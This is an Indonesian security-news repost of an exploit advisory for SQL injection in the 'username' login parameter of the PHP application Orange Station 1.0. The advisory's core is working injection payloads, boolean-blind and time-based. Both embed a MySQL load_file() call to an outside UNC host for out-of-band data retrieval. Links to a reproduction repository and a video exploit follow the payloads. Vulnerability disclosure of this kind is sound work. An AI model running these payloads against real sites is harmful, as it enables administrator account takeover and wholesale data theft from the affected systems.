Orange Station 1.0 SQL Injection

  • Whatsapp
Apache Log4j2 2.14.1 Eksekusi Kode Jarak Jauh
Apache Logj Eksekusi Kode Jarak Jauh

News.nextcloud.asia

Orange Station versi 1.0 mengalami kerentanan injeksi SQL jarak jauh.

SHA-256 | bc806ec8a1b7987066ae02e775d55e0aec7f7430529cf3e3f8cf23c4bb6311a5

## Title: Orange Station 1.0 SQLi
## Author: nu11secur1ty
## Date: 0.16.2022
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0

## Description:
The `username` parameter appears to be vulnerable to SQL injection attacks.
The attacker can take administrator accounts control and also of all
accounts, also the malicious user can download all information about
this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: [email protected]'+(select
load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''
OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]'+(select
load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''
AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND
'yPPS'='yPPS&password=rootadmin&login=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0)

## Proof and Exploit:
[href](https://streamable.com/sz3tfi)

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.